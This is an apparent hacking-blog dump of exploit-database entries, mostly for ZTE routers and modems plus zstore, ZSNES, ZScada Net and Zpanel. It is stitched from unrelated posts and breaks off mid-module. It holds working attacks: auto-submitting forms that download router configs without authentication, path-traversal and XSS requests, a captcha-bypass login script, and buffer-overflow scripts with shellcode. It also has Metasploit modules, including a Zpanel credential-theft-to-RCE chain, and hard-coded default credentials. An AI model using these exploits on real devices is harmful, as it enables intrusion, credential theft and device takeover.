<!--
ZTE ZXHN H108N unauthenticated config download
Copyright 2015 (c) Todor Donev
todor.donev@gmail.com
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
http://pastebin.com/u/hackerscommunity
Tested device:
Model ZXHN H108N
Software Version V3.3.0_MU
Description:
Does not check cookies and credentials on POST
method so attackers could download the config
file without authentication.
\!/\!/\!/
Use at your own Use at your own
risk and educational risk and educational
purpose ONLY! purpose ONLY!
Disclaimer:
This or previous program is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use at your own Use at your own
risk and educational risk and educational
purpose ONLY! purpose ONLY!
/i\/i\/i\
-->
<html>
<title>ZTE ZXHN H108N unauthenticated config download</title>
<body onload=javascript:document.ethack.submit()>
<p>ZTE ZXHN H108N Exploiting..</p>
<form name="ethack" method="POST" action="http://TARGET/getpage.gch?pid=101" enctype="multipart/form-data">
<input type="hidden" name="config" id="config" value="">
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863587812
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple
vulnerabilities]
# Discovered by: Karn Ganeshen
# CERT VU# 391604
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported
# ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A
# ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE
Overview
ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10
W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.
*CVE-ID*:
CVE-2015-7248
CVE-2015-7249
CVE-2015-7250
CVE-2015-7251
CVE-2015-7252
*Note*: Large deployment size, primarily in Peru, used by TdP.
Description
*CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information
Exposure* - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain
credentials and other sensitive details about the ZXHN H108N R1A.
A. User names and password hashes can be viewed in the page source of
http://<IP>/cgi-bin/webproc
PoC:
Login Page source contents:
...snip....
//get user info
var G_UserInfo = new Array();
var m = 0;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "admin"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here
G_UserInfo[m][2] = "1"; //Level
G_UserInfo[m][3] = "1"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "user"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "2"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "support"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "3"; //Index
m++;
...snip...
B. The configuration file of the device contains usernames, passwords,
keys, and other values in plain text, which can be used by a user with
lower privileges to gain admin account access. This issue also affects ZTE
ZXV10 W300 models, version W300V1.0.0f_ER1_PE.
*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper
Authorization* - CVE-2015-7249
By default, only admin may authenticate directly with the web
administration pages in the ZXHN H108N R1A. By manipulating parameters in
client-side requests, an attacker may authenticate as another existing
account, such as user or support, and may be able to perform actions
otherwise not allowed.
PoC 1:
1. Login page user drop-down option shows only admin only.
2. Use an intercepting proxy / Tamper Data - and intercept the Login submit
request.
3. Change the username admin to user / support and continue Login.
4. Application permits other users to log in to mgmt portal.
PoC 2:
After logging in as support, some functional options are visibly
restricted. Certain actions can still be performed by calling the url
directly. Application does not perform proper AuthZ checks.
Following poc is a change password link. It is accessible directly, though
it (correctly) is restricted to changing normal user (non-admin) password
only.
http://
<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd
Other functions / pages may also be accessible to non-privileged users.
*CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper
Limitation of a Pathname to a Restricted Directory ('Path Traversal') *-
CVE-2015-7250
The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter
which takes an unrestricted file path as input, allowing an attacker to
read arbitrary files on the system.
Arbitrary files can be read off of the device. No authentication is
required to exploit this vulnerability.
PoC
HTTP POST request
POST /cgibin/webproc HTTP/1.1
Host: IP
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
AcceptLanguage: enUS,en;q=0.5
AcceptEncoding: gzip, deflate
Referer: https://IP/cgibin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keepalive
ContentType: application/xwwwformurlencoded
ContentLength: 177
getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
HTTP Response
HTTP/1.0 200 OK
Contenttype: text/html
Pragma: nocache
CacheControl: nocache
setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59
GMT;path=/
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
*CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of
Hard-coded Credentials* - CVE-2015-7251
In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible
using the hard-coded credentials 'root' for both the username and password.
*CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper
Neutralization of Input During Web Page Generation ('Cross-site
Scripting') *- CVE-2015-7252
In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is
vulnerable to reflected cross-site scripting [pre-authentication].
PoC
POST /cgibin/webproc HTTP/1.1
Host: IP
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
AcceptLanguage: enUS,en;q=0.5
AcceptEncoding: gzip, deflate
Referer: https://IP/cgibin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keepalive
ContentType: application/xwwwformurlencoded
ContentLength: 177
getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
+++++
--
Best Regards,
Karn Ganeshen
# Exploit Title: ZTE ZXDSL 831 Unauthorized Configuration Access
# Date: 27/11/2017
# Exploit Author: Ibad Shah
# Vendor Homepage: zte.com.cn
# Software Link: -
# Version: - ZXDSL - 831CII
# Tested on: Windows 10
# CVE :- 2017-16953
=======================================
The Router usually servers html files & are protected with HTTP Basic
Authentication. However, the CGI files does not protect this file from
getting exposed to public. A Simple GET request would be needed to
made to router that would give a remote attacker an opportunity to
modify router PPPoE configurations, setup malicious configurations
which later could lead to disrupt network & its activities.
Proof Of Concept
================
http://192.168.1.1/connoppp.cgi
# Exploit Title: ZTE Router F602W - Captcha Bypass
# Exploit Author: Hritik Vijay (@MrHritik)
# Vendor Homepage: https://zte.com.cn
# Reported: 2019-06-14
# Version: F6x2W V6.0.10P2T2
# Version: F6x2W V6.0.10P2T5
# Tested on: F602W
# CVE: CVE-2020-6862
Background
-----------
Captcha is used to make sure the form is being filled by a real person
than an automated script. This is a very popular safety measure and
bypassing it could lead to potential compromise.
Introduction
------------
While logging in to the affected device you are presented with a
username, password and captcha field. Submitting the form results in an
HTTP request being sent out to /checkValidateCode.gch to validate the
captcha, if valid it goes on to really submit the login request. This
can be easily bypassed as this is a client side verification. One can
always ignore the response and proceed to forcefully submit the form via
Javascript (via calling the subpageSubmit() method).
A typical login request looks like this:
POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: _TESTCOOKIESUPPORT=1
Upgrade-Insecure-Requests: 1
frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything
Though, firing the same request twice fails with a text on the top
saying "Error". This pretty much defeats our purpose. It turns out that
on every login attempt, the parameter Frm_Logintoken gets incremented by
one and is required to match the server side value. This can pretty
easily be achieved by some pattern matching. Thus allowing any script
to bypass the captcha and log in.
Threat
-------
A captcha bypass can really help in bruteforcing the credentials but
luckily the router limits the login trials to 3 attempts. In real
world though, things are a bit different.
The affected ZTE router comes with a default password. Given that the
devices on a same ISP network can access each other, it would be a
matter of time before someone writes a script to log in to every router
in the network and take control of it.
PoC
-------
#!/bin/bash
SERVER=192.168.1.1
USER="admin"
PASS="admin"
getToken(){
curl -s --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4
}
Frm_Logintoken=`getToken`
s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie)
if [[ $s -eq 302 ]]; then
echo "Logged in"
echo "Open http://$SERVER/start.ghtml"
echo `grep -o Set-Cookie.* /tmp/zte_cookie`
else
echo "Failed"
fi
#!/usr/bin/python -w
# Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow
# Date : 17/09/2015
# Author : R-73eN
# Tested on : Windows Xp sp3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02
# Since all the PC UI based software shares the same source code they are all vulnerable.(Confirmed By ZTE)
# The problem exists into the import function at PhoneBook Menu which doesn't
# validate data and importing a malformed file leads to code execution.
#
# Triggering the Vulnerability
# run this python script which will save an evil.txt file.
# Open Eagle Speed, go to PhoneBook , click Import and select the evil.txt File
# A calculator Should pop up.
#
# Disclosure Timeline:
# [16/08/2015] - Vendor notified
# [18/08/2015] - Vendor Responded asking for more details
# [17/08/2015] - Vendor Responded that will not release a patch since the product is at end of life.
#
# Solution:
# Don't import unknown text file.
#
# Video - https://www.youtube.com/watch?v=jbv1L4TrHTY
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
shellcode = "" #msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f"
shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29"
shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25"
shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d"
shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5"
shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b"
shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8"
shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc"
shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93"
shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36"
shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06"
shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e"
shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c"
shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1"
shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c"
shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4"
shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef"
shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82"
filename="evil.txt"
nSEH = "\xEB\x06\x90\x90"
SEH = "\xab\x11\x9f\x0f"
buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Evil.txt created successfully [+]"
/*
Exploit Title : ZTE remote configuration download
Date : 09 May 2015
Exploit Author : Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform : Hardware
Tested On : ZTE F660
Firmware Version: 2.22.21P1T8S
--------------------------
Config remote download
--------------------------
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without
authentication.
*/
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="
http://192.168.1.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch"
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</body>
</html>
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn Ganeshen
# Exploit Title: ZTE AC 3633R USB Modem Multiple Vulnerabilities
# Date: 4/06/2015
# Exploit Author: [Vishnu (@dH3wK)
# Vendor Homepage: [http://zte.com.cn
# Version: 3633R
# Tested on: Windows, Linux
Greetings from vishnu (@dH4wk)
1. Vulnerable Product Version
- ZTE AC3633R (MTS Ultra Wifi Modem)
2. Vulnerability Information
(A) Authentication Bypass
Impact: Attacker gains administrative access
Remotely Exploitable: UNKNOWN
Locally Exploitable: YES
(B) Device crash which results in reboot
Impact: Denial of service, The crash may lead to RCE locally thus
attaining root privilege on the device
Remotely Exploitable: UNKNOWN
Locally Exploitable: YES
3. Vulnerability Description
(A) The administrative authentication mechanism of the modem can be
bypassed by feeding with a string of 121 characters in length, either in
username or password field.
(B) A crash causes the modem to restart. This is caused when either of
the password or username fields are fed with an input of 130 characters
or above.
[Note: If username is targeted for exploitation, then password field shall
be fed with minimum 6 characters (any characters) and vice versa ]
## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.29.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
## Description:
The value of manual insertion `point 1` is copied into the HTML
document as plain text between tags.
The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
the manual insertion point 1.
This input was echoed unmodified in the application's response.
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a
HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
[+] Response:
```
HTTP/2 200 OK
Server: nginx
Date: Sun, 29 Jan 2023 07:27:55 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546
Class \App\Pages\Chatgiflc<a
href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img
src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif">
does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>
```
## Proof and Exploit:
[href](https://streamable.com/aadj5c)
## Reference:
[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Exploit Title: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.18.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
## Description:
The value of manual insertion point 1 is copied into the HTML document
as plain text between tags.
The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
the manual insertion point 1.
This input was echoed unmodified in the application's response.
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a
HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
## Proof and Exploit:
[href](https://streamable.com/tplz84)
## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting/reflected)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Author: Juan Sacco - http://www.exploitpack.comp <jsacco@exploitpack.com>
# Tested on: GNU/Linux - Kali Linux 2.0
# Description: ZSNES v1.51 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.zsnes.com
# Kali Linux 2.0 package: 1.510+bz2-8 (/var/lib/apt/lists/http.kali.org_kali_dists_sana_main_binary-i386_Packages)
# MD5: 23c1e4d12b6b8895961a29f2fd91570b
def run():
try:
print "# ZSNES v1.51 Stack-BoF by Juan Sacco"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*8
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*589
eip = "\x10\xf0\xff\xbf"
subprocess.call(["zsnes", junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "ZSNES not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
print "Author: Juan Sacco (Runlvl)"
except IndexError:
howtousage()
run()
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'ZScada Net Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
Z-Scada Net 2.0. The vulnerability is triggered when parsing
the response to a Modbus packet.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'url', 'https://lists.immunityinc.com/pipermail/canvas/2014-December/000141.html' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# zscadanet.exe v1.0
# pop ecx/ pop ebp/ retn
'Ret' => 0x00429c35
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 11 2014'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 502])
], self.class)
end
def on_client_data(client)
p = payload.encoded
buf = pattern_create(5000)
buf[574, 4] = [0x909006eb].pack('V') # jmp $+8
buf[578, 4] = [target.ret].pack('V')
buf[582, 24] = "\x41" * 24
buf[606, p.length] = p
client.put(buf)
handler
service.close_client(client)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
require 'nokogiri'
require 'uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Zpanel Remote Unauthenticated RCE',
'Description' => %q{
This module exploits an information disclosure vulnerability
in Zpanel. The vulnerability is due to a vulnerable version
of pChart used by ZPanel that allows unauthenticated users to read
arbitrary files remotely on the file system. This particular module
utilizes this vulnerability to identify the username/password
combination of the MySQL instance. With the
credentials the attackers can login to PHPMyAdmin and execute
SQL commands to drop a malicious payload on the filesystem and
call it leading to remote code execution.
},
'Author' =>
[
'Balazs Makany', # pChart vuln discovery
'Jose Antonio Perez', # Found vulnerable version of pChart on ZPanel
'dawn isabel',
'brad wolfe',
'brent morris',
'james fitts'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31173' ], # vulnerable version of pChart used by zpanel
[ 'OSVDB', '102595' ], # vulnerable version of pChart used by zpanel
[ 'URL', 'http://blog.0xlabs.com/2014/03/zpanel-10.1.x-remote-root.html' ],
[ 'URL', 'http://pastebin.com/y5Pf4Yms' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 30 2014'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Zpanel', '/zpanel'])
], self.class)
end
def get_setting(res, setting_name)
n = ::Nokogiri::HTML(res.body)
spans = n.search('//code//span//span')
found_element = spans.select{ |e| /#{setting_name}/ === e.text }.first
val = found_element.next.next.text
val.scan(/['"]([[:print:]]+)['"]/).flatten.first || ''
end
def get_user(res)
get_setting(res, 'user')
end
def get_passwd(res)
get_setting(res, 'pass')
end
def get_dbname(res)
get_setting(res, 'dbname')
end
def dot_dot_slash(uri)
res = send_request_cgi({
'method' =>'GET',
'uri' => normalize_uri("#{uri}", 'etc', 'lib', 'pChart2', 'examples', 'index.php'),
'vars_get' => {
'Action' => 'View',
'Script' => '../../../../cnf/db.php'
}
})
uname = get_user(res)
passwd = get_passwd(res)
dbname = get_dbname(res)
return uname, passwd, dbname
end
def get_token_from_form(res)
hidden_inputs = res.get_hidden_inputs
hidden_inputs.first['token']
end
def get_token_from_url(url)
u = URI(url)
u.query.split('&').each do |param|
param_name, param_value = param.scan(/([[:print:]]+)=([[:print:]]+)/).flatten
return param_value if param_name == 'token'
end
''
end
def grab_sess_and_token(uri)
print_status('Attempting to get PHPSESSIONID')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}"),
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while attempting to get PHPSESSID')
end
cookies = res.get_cookies
sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
if sid.length > 0
print_good('PHPSESSID identified!')
print_good("PHPSESSID = #{sid.split("=")[1]}")
print_status('Attempting to get CSRF token')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}", 'etc', 'apps', 'phpmyadmin', 'index.php'),
'Cookie' => "#{sid}"
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while attempting to get CSRF token')
end
token = get_token_from_form(res)
cookies = res.get_cookies
cookies = cookies.split('; ')
cookies = "#{cookies[-1]} #{cookies[1]}; #{cookies[2]}; #{cookies[3]}; #{sid}"
if token.length > 0
print_good('CSRF token identified!')
